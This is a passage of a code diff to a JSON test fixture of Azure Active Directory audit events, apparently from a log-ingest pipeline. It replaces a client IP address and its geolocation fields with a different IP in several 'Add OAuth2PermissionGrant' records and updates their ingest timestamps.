Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -11139,25 +10185,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -11171,7 +10199,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -11307,7 +10335,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -11319,12 +10347,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036403800Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125153900Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -11350,25 +10378,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -11382,7 +10392,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -11518,7 +10528,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -11530,12 +10540,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036408100Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125160100Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b